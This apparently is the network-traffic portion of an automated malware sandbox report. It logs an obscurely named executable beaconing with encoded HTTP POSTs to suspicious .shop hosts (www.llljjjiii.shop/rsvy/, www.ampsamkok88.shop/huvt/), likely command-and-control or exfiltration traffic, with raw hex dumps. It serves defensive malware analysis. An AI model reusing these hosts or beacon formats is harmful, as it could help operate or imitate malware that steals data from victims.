                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Nov 21, 2024 16:58:42.323697090 CET1236INHTTP/1.1 200 OK
                                                                                                                    Date: Thu, 21 Nov 2024 15:58:41 GMT
                                                                                                                    Server: Apache
                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                    Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                    Set-Cookie: vsid=903vr47975032158793411; expires=Tue, 20-Nov-2029 15:58:41 GMT; Max-Age=157680000; path=/; domain=www.matteicapital.online; HttpOnly
                                                                                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_gLNyLfO3iicecvJdoUIX5eyiHAv+iDY66vZrKTOogJwIxw/kbIeScwahwpGJbhLh5iXYGYw9xBhfu+lXDNbhuw==
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 39 66 32 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e
                                                                                                                    Data Ascii: 9f23<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.n
                                                                                                                    Nov 21, 2024 16:58:42.323741913 CET1236INData Raw: 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64
                                                                                                                    Data Ascii: et"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid"
                                                                                                                    Nov 21, 2024 16:58:42.323760033 CET1236INData Raw: 63 74 69 6f 6e 28 6a 29 7b 69 66 28 74 79 70 65 6f 66 28 6a 29 21 3d 22 62 6f 6f 6c 65 61 6e 22 29 7b 6a 3d 74 72 75 65 7d 69 66 28 6a 26 26 74 79 70 65 6f 66 28 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 29 3d 3d 22 73 74 72 69
                                                                                                                    Data Ascii: ction(j){if(typeof(j)!="boolean"){j=true}if(j&&typeof(cmp_getlang.usedlang)=="string"&&cmp_getlang.usedlang!==""){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="langua
                                                                                                                    Nov 21, 2024 16:58:42.323827028 CET1236INData Raw: 6e 67 75 61 67 65 73 22 20 69 6e 20 68 29 7b 66 6f 72 28 76 61 72 20 71 3d 30 3b 71 3c 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 2e 6c 65 6e 67 74 68 3b 71 2b 2b 29 7b 69 66 28 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67
                                                                                                                    Data Ascii: nguages" in h){for(var q=0;q<h.cmp_customlanguages.length;q++){if(h.cmp_customlanguages[q].l.toUpperCase()==o.toUpperCase()){o="en";break}}}b="_"+o}function x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.has
                                                                                                                    Nov 21, 2024 16:58:42.323844910 CET548INData Raw: 22 2b 68 2e 63 6d 70 5f 70 61 72 61 6d 73 3a 22 22 29 2b 28 75 2e 63 6f 6f 6b 69 65 2e 6c 65 6e 67 74 68 3e 30 3f 22 26 5f 5f 63 6d 70 66 63 63 3d 31 22 3a 22 22 29 2b 22 26 6c 3d 22 2b 6f 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2b 22 26 6f 3d
                                                                                                                    Data Ascii: "+h.cmp_params:"")+(u.cookie.length>0?"&__cmpfcc=1":"")+"&l="+o.toLowerCase()+"&o="+(new Date()).getTime();j.type="text/javascript";j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}el
                                                                                                                    Nov 21, 2024 16:58:42.373095036 CET1236INData Raw: 6d 70 64 65 62 75 67 75 6e 6d 69 6e 69 6d 69 7a 65 64 3a 30 29 3e 30 3f 22 22 3a 22 2e 6d 69 6e 22 3b 76 61 72 20 61 3d 78 28 22 63 6d 70 64 65 62 75 67 63 6f 76 65 72 61 67 65 22 2c 22 63 6d 70 5f 64 65 62 75 67 63 6f 76 65 72 61 67 65 22 20 69
                                                                                                                    Data Ascii: mpdebugunminimized:0)>0?"":".min";var a=x("cmpdebugcoverage","cmp_debugcoverage" in h?h.cmp_debugcoverage:"");if(a=="1"){m="instrumented";p=""}var j=u.createElement("script");j.src=k+"//"+h.cmp_cdn+"/delivery/"+m+"/cmp"+b+p+".js";j.type="text/
                                                                                                                    Nov 21, 2024 16:58:42.373114109 CET1236INData Raw: 3d 22 20 22 29 7b 62 3d 62 2e 73 75 62 73 74 72 28 31 2c 62 2e 6c 65 6e 67 74 68 29 7d 76 61 72 20 67 3d 62 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 62 2e 69 6e 64 65 78 4f 66 28 22 3d 22 29 29 3b 69 66 28 62 2e 69 6e 64 65 78 4f 66 28 22 3b 22 29
                                                                                                                    Data Ascii: =" "){b=b.substr(1,b.length)}var g=b.substring(0,b.indexOf("="));if(b.indexOf(";")!=-1){var c=b.substring(b.indexOf("=")+1,b.indexOf(";"))}else{var c=b.substr(b.indexOf("=")+1,b.length)}if(h==g){f=c}var e=b.indexOf(";")+1;if(e==0){e=b.length}b
                                                                                                                    Nov 21, 2024 16:58:42.373130083 CET1236INData Raw: 22 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 67 70 70 5f 70 69 6e 67 28 29 7d 65 6c 73 65 7b 69 66 28 67 3d 3d 3d 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 29 7b 5f 5f 67 70 70 2e 65 3d 5f 5f 67 70 70 2e 65 7c 7c 5b
                                                                                                                    Data Ascii: "){return window.cmp_gpp_ping()}else{if(g==="addEventListener"){__gpp.e=__gpp.e||[];if(!("lastId" in __gpp)){__gpp.lastId=0}__gpp.lastId++;var c=__gpp.lastId;__gpp.e.push({id:c,callback:f});return{eventName:"listenerRegistered",listenerId:c,da
                                                                                                                    Nov 21, 2024 16:58:42.373259068 CET672INData Raw: 6f 6d 6d 61 6e 64 2c 62 2e 76 65 72 73 69 6f 6e 2c 66 75 6e 63 74 69 6f 6e 28 68 2c 67 29 7b 76 61 72 20 65 3d 7b 5f 5f 75 73 70 61 70 69 52 65 74 75 72 6e 3a 7b 72 65 74 75 72 6e 56 61 6c 75 65 3a 68 2c 73 75 63 63 65 73 73 3a 67 2c 63 61 6c 6c
                                                                                                                    Data Ascii: ommand,b.version,function(h,g){var e={__uspapiReturn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")})}if(typeof(c)==="object"&&c!==null&&"__tcfapiCall" in c){var b=c.__tcfapiCall;window.__tcfapi(b.co
                                                                                                                    Nov 21, 2024 16:58:42.373275042 CET1236INData Raw: 72 73 69 6f 6e 3a 31 29 7d 7d 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 65 74 53 74 75 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 28 61 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 28 74 79 70 65 6f 66 28 77 69 6e 64 6f 77 5b 61 5d 29 21 3d 3d
                                                                                                                    Data Ascii: rsion:1)}};window.cmp_setStub=function(a){if(!(a in window)||(typeof(window[a])!=="function"&&typeof(window[a])!=="object"&&(typeof(window[a])==="undefined"||window[a]!==null))){window[a]=window.cmp_stub;window[a].msgHandler=window.cmp_msghand
                                                                                                                    Nov 21, 2024 16:58:42.443572044 CET1236INData Raw: 29 7d 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76
                                                                                                                    Data Ascii: )};</script><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.matteicapital.online/px.js?ch=1"></script><script type="text/javascript" src="http://www.matteicapital.online/px.js?ch=2"></script><scri


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    25192.168.2.4499278.210.114.150803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:58:48.195025921 CET610OUTPOST /rsvy/ HTTP/1.1
                                                                                                                    Host: www.llljjjiii.shop
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.llljjjiii.shop
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.llljjjiii.shop/rsvy/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 6d 2b 37 4b 49 4d 74 4a 34 2f 42 54 33 4b 49 67 36 67 64 6b 34 54 50 67 68 67 43 44 55 7a 30 42 6f 6e 7a 50 46 35 63 4d 31 5a 6a 77 31 56 77 49 50 6b 54 45 34 63 66 42 4d 57 30 52 4a 58 4e 37 4f 67 65 2b 61 57 48 62 79 43 33 6a 45 72 45 62 6d 75 31 49 42 76 36 52 79 30 6f 66 39 53 66 69 35 6a 36 37 34 61 48 32 62 65 79 55 43 77 59 72 36 31 68 34 73 63 6f 4c 5a 2f 74 74 30 63 43 30 6f 30 36 6c 55 64 36 78 33 38 39 6c 30 58 32 58 6e 66 64 34 50 6d 39 56 6a 36 62 7a 31 55 74 4f 4a 6f 44 33 2b 71 39 6b 57 2f 74 51 2f 54 67 38 52 52 6a 6b 56 2b 37 50 6f 50 6f 41 59 75 2b 62 63 77 3d 3d
                                                                                                                    Data Ascii: GzeXFT7=m+7KIMtJ4/BT3KIg6gdk4TPghgCDUz0BonzPF5cM1Zjw1VwIPkTE4cfBMW0RJXN7Oge+aWHbyC3jErEbmu1IBv6Ry0of9Sfi5j674aH2beyUCwYr61h4scoLZ/tt0cC0o06lUd6x389l0X2Xnfd4Pm9Vj6bz1UtOJoD3+q9kW/tQ/Tg8RRjkV+7PoPoAYu+bcw==


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    26192.168.2.4499338.210.114.150803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:58:50.872724056 CET630OUTPOST /rsvy/ HTTP/1.1
                                                                                                                    Host: www.llljjjiii.shop
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.llljjjiii.shop
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.llljjjiii.shop/rsvy/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 6d 2b 37 4b 49 4d 74 4a 34 2f 42 54 32 71 34 67 38 42 64 6b 36 7a 50 2f 75 41 43 44 4f 44 30 64 6f 6e 76 50 46 38 39 58 31 4d 37 77 30 78 30 49 4f 6c 54 45 2f 63 66 42 45 32 30 55 4e 58 4e 77 4f 67 54 42 61 58 37 62 79 43 7a 6a 45 6f 51 62 6e 64 64 4c 51 76 36 54 72 6b 6f 64 7a 79 66 69 35 6a 36 37 34 65 58 59 62 65 61 55 43 68 49 72 37 58 5a 2f 33 38 6f 49 4a 50 74 74 6a 4d 44 39 6f 30 36 54 55 59 62 61 33 35 35 6c 30 57 47 58 6d 4b 78 33 45 6d 39 54 2b 4b 62 69 79 48 63 64 47 36 53 6d 77 61 70 34 59 63 52 7a 7a 31 74 6d 41 67 43 7a 48 2b 66 38 31 49 68 30 56 74 44 53 48 37 74 67 2f 38 36 6f 57 4a 58 4e 67 4b 63 50 69 75 37 4e 50 54 49 3d
                                                                                                                    Data Ascii: GzeXFT7=m+7KIMtJ4/BT2q4g8Bdk6zP/uACDOD0donvPF89X1M7w0x0IOlTE/cfBE20UNXNwOgTBaX7byCzjEoQbnddLQv6Trkodzyfi5j674eXYbeaUChIr7XZ/38oIJPttjMD9o06TUYba355l0WGXmKx3Em9T+KbiyHcdG6Smwap4YcRzz1tmAgCzH+f81Ih0VtDSH7tg/86oWJXNgKcPiu7NPTI=


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    27192.168.2.4499398.210.114.150803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:58:53.539810896 CET10712OUTPOST /rsvy/ HTTP/1.1
                                                                                                                    Host: www.llljjjiii.shop
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.llljjjiii.shop
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.llljjjiii.shop/rsvy/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 6d 2b 37 4b 49 4d 74 4a 34 2f 42 54 32 71 34 67 38 42 64 6b 36 7a 50 2f 75 41 43 44 4f 44 30 64 6f 6e 76 50 46 38 39 58 31 4d 7a 77 30 43 38 49 50 47 37 45 2b 63 66 42 4b 57 30 56 4e 58 4e 58 4f 67 4c 46 61 58 33 74 79 41 62 6a 65 4b 49 62 76 49 70 4c 5a 76 36 54 6b 45 6f 41 39 53 65 36 35 6a 71 2f 34 61 7a 59 62 65 61 55 43 6a 67 72 76 31 68 2f 31 38 6f 4c 5a 2f 74 78 30 63 43 59 6f 77 57 44 55 59 66 73 33 4e 4e 6c 7a 32 57 58 71 63 46 33 4a 6d 39 52 39 4b 61 2f 79 48 52 46 47 36 65 71 77 61 64 43 59 62 35 7a 6a 54 30 48 43 52 2b 2f 63 2f 62 7a 6a 49 52 49 53 2b 37 4e 4a 62 77 65 2f 39 61 50 42 71 6e 32 76 34 45 46 78 4e 50 46 63 32 52 48 39 68 63 70 38 58 65 37 53 48 43 6f 58 76 6b 6f 4d 65 75 5a 2f 2b 51 67 67 49 4c 62 67 2f 77 78 72 51 6a 58 2b 76 42 59 4c 37 48 59 2f 39 7a 7a 75 49 45 4b 32 53 6f 63 4f 4e 38 52 30 6d 74 72 6f 42 36 56 63 44 6e 73 73 6a 61 52 4e 4a 47 51 42 37 72 76 51 58 43 4f 33 56 68 62 42 65 63 33 49 39 48 45 4a 6b 61 69 4e 6e 67 63 53 34 58 4d 31 56 [TRUNCATED]
                                                                                                                    Data Ascii: GzeXFT7=m+7KIMtJ4/BT2q4g8Bdk6zP/uACDOD0donvPF89X1Mzw0C8IPG7E+cfBKW0VNXNXOgLFaX3tyAbjeKIbvIpLZv6TkEoA9Se65jq/4azYbeaUCjgrv1h/18oLZ/tx0cCYowWDUYfs3NNlz2WXqcF3Jm9R9Ka/yHRFG6eqwadCYb5zjT0HCR+/c/bzjIRIS+7NJbwe/9aPBqn2v4EFxNPFc2RH9hcp8Xe7SHCoXvkoMeuZ/+QggILbg/wxrQjX+vBYL7HY/9zzuIEK2SocON8R0mtroB6VcDnssjaRNJGQB7rvQXCO3VhbBec3I9HEJkaiNngcS4XM1V8NeBcwMqlcW74R3R1j4QqDjEn1cFE7ph6LED3kNPS+byu/bCLhg9z8+oiR+x9vSHYLR5sYwZhAcPq2M61xSlj2O3fc/xx7b4IUiOmlTWertL3ZxVNQyiIVlEbuxb5nxBAuLd3HxEwPQ2B8VPPrDXtGEakfgqy2cFSazbDxZ1d272ktwh9Jj0q2LMkPCnmOYro8cuIkoE1U6+4mrXIzQXTHAjgbYqwv34iH3dClFWIHVRRvOlfJwiusVsLvFc5ndJeth+He2A6uqxPB8LQ1VSckm2F+FO/9d1O2WOjuWate/nLrSZwxqf5xbTclgYK50hyNx4Mzx5t9729x6fbaf6jHtBGL92RIyYiTD6M8g4B5nvk3HNJuzG8GNuJRFcDieX3Z4PiA2TVva5Wht/BOZRBtjBdR0e2HzE1ZtVsE/FfXpUx/eO6FVC/yyQjHew0nCElk31mlxhdhtnfl+8ocqPx8s6kjwjedSkGE69zENuHLLVgqPbEaYCaWJdZUoF04w/Tx+0Hkq1fyV1EFV9s9M/xSXtBt+HJLNA5Vt+HSeNXEVzfVT+n2xFlllMTejJnLNaXonGeTDNPkzQIixp4bZogtOVYc4jKg1tG4veHYF+vFYBWa9Bk0sI/8WRa7YQnNhqmwZdWLrqigg9U5p6dpcx7C/sGflAhVESgB [TRUNCATED]


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    28192.168.2.4499458.210.114.150803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:58:56.205312014 CET348OUTGET /rsvy/?GzeXFT7=r8TqL8lVmKhCyKgitQBFywHntQnNTxsH+3nLHstVk9be2gQWJEXa9NKMMz87e0tjGxvoPEvy6SLnfdtsmt5rXvvnrxwIlwzliiyA/L7dY/WJb14Y701b98g=&aJZ=OnOxa0A0n0BXj0 HTTP/1.1
                                                                                                                    Host: www.llljjjiii.shop
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Nov 21, 2024 16:58:57.757729053 CET1120INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 21 Nov 2024 15:58:57 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Set-Cookie: PHPSESSID=8iulr90tsq780ka3cqbfgef7k1; path=/
                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                    Pragma: no-cache
                                                                                                                    Set-Cookie: sessionid=8iulr90tsq780ka3cqbfgef7k1; expires=Sun, 19-Nov-2034 15:58:57 GMT; Max-Age=315360000; path=/
                                                                                                                    Data Raw: 32 36 38 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 75 62 6c 69 63 2f 6a 61 76 61 73 63 72 69 70 74 2f 6a 71 75 65 72 79 2d 32 2e 32 2e 33 2e 6d 69 6e 2e 6a 73 3f 76 3d 22 20 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 36 64 61 35 63 33 3b 22 3e 0a 3c 69 6d 67 20 73 74 79 6c 65 3d 27 6d 61 78 2d 77 69 64 74 68 3a 20 34 30 30 70 78 3b 77 69 64 74 68 3a 20 31 30 30 25 3b 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c [TRUNCATED]
                                                                                                                    Data Ascii: 268<html><head> <meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no" /> <script src="/public/javascript/jquery-2.2.3.min.js?v=" type="text/javascript"></script></head><body style="background-color: #6da5c3;"><img style='max-width: 400px;width: 100%;position: absolute;right: 0;top: 30%;left: 0;margin: 0 auto;' src="/public/image/404.png"/>...<h1 style='width: 400px;position: absolute;margin-left: -200px;margin-top: -80px;top: 50%;left: 50%;display: block;z-index: 2000;color:#FB7C7C;text-align: center'> 404 Not Found </h1>--></body></html>0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    29192.168.2.449962172.67.209.48803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:59:03.071945906 CET616OUTPOST /huvt/ HTTP/1.1
                                                                                                                    Host: www.ampsamkok88.shop
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.ampsamkok88.shop
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.ampsamkok88.shop/huvt/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 2f 7a 2f 30 37 79 78 66 44 6a 58 32 36 65 38 69 65 39 53 76 70 54 2b 72 38 6a 6f 6b 73 32 31 35 50 36 31 57 62 67 4e 34 74 54 36 63 7a 63 31 6a 47 52 50 39 6d 61 35 4b 6e 4a 4b 36 64 38 44 51 53 78 51 43 64 57 52 39 68 77 66 5a 63 59 31 39 38 65 4e 75 5a 46 6a 52 52 4f 6c 73 35 62 4a 49 71 2f 41 73 77 49 71 46 6c 65 57 71 4c 34 35 63 56 2b 33 77 51 4e 4f 57 75 33 6b 69 31 63 73 76 6b 59 71 73 4c 53 47 54 64 4e 37 48 59 4f 56 56 58 50 78 72 6f 46 34 66 50 51 79 6c 31 37 46 4f 6e 4e 47 31 44 69 6a 44 56 35 4e 43 54 31 6b 46 4a 6d 78 67 78 76 43 31 2b 55 69 4b 56 49 4e 45 6c 51 3d 3d
                                                                                                                    Data Ascii: GzeXFT7=/z/07yxfDjX26e8ie9SvpT+r8joks215P61WbgN4tT6czc1jGRP9ma5KnJK6d8DQSxQCdWR9hwfZcY198eNuZFjRROls5bJIq/AswIqFleWqL45cV+3wQNOWu3ki1csvkYqsLSGTdN7HYOVVXPxroF4fPQyl17FOnNG1DijDV5NCT1kFJmxgxvC1+UiKVINElQ==
                                                                                                                    Nov 21, 2024 16:59:04.306205034 CET1236INHTTP/1.1 404 Not Found
                                                                                                                    Date: Thu, 21 Nov 2024 15:59:04 GMT
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xbk2xpmn2RY%2BuzWXyDVwccsVPBXTxV5Cuj%2FTctMmxBpK7gToTpgo83r75%2BwVMmeuexNN1dHL3ZAjlqFMGxWr9cNCoTvVTrhDU5h6SBFdgypcltpyrac10duyWExpHUrczPsa%2BYfWKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8e61e2822c0b4313-EWR
                                                                                                                    Content-Encoding: gzip
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1650&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=616&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                    Data Raw: 32 62 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 54 ef 6b db 30 10 fd 9e bf 42 0d a5 b2 21 b5 93 34 8c 52 ff 80 36 49 59 21 49 cb 96 32 c6 18 45 96 ce b6 8a 22 79 92 92 90 25 fe df 87 ed 34 cd 0a ed d8 07 83 a4 7b ef de dd e9 59 e1 c9 e8 7e 38 ff fe 30 46 9f e7 d3 09 7a 78 bc 99 dc 0d 51 fb dc f7 ef c6 f3 5b df 1f cd 47 4d a4 ef 75 7d 7f 3c 6b c7 ad 30 b7 0b 11 87 39 10 16 b7 42 cb ad 80 78 d0 1d a0 99 b2 e8 56 2d 25 0b fd e6 b0 15 fa 35 28 4c 14 db 54 bc 5e 7c 84 c9 7b 71 2b 2c e2 79 0e 48 c3 af 25 18 0b 0c 3d 7e 99 a0 35 31 48 2a 8b d2 0a 87 94 44 36 e7 06 19 d0 2b d0 5e e8 17 35 ed 9a 31 6e b9 92 44 88 4d 07 11 f4 57 01 2d d0 5a e9 3a 11 48 aa 96 d2 82 06 86 d6 39 17 80 ac de 70 99 21 ab d0 d2 00 22 12 8d 2b f0 48 d1 e5 02 a4 ad ce 73 22 59 05 7c ad 6c 2f 6b a8 e6 85 8d 9d 74 29 69 25 ee b8 db 97 25 a2 8e bb 5d 11 8d 92 88 78 54 49 0b d2 be e4 dc ed 0e 47 df b8 64 6a ed b1 7d 24 e0 a9 93 34 3c 16 25 1e d5 40 2c 8c 05 54 31 07 37 72 d8 0d 98 c7 a5 04 5d dd 43 d4 5e 37 29 9e 9e 86 b7 a7 74 75 5a 10 [TRUNCATED]
                                                                                                                    Data Ascii: 2b2Tk0B!4R6IY!I2E"y%4{Y~80FzxQ[GMu}<k09BxV-%5(LT^|{q+,yH%=~51H*D6+^51nDMW-Z:H9p!"+Hs"Y|l/kt)i%%]xTIGdj}$4<%@,T17r]C^7)tuZM&+|zi7\.p^>g#"\,^jyWxRI)4> 38/0A
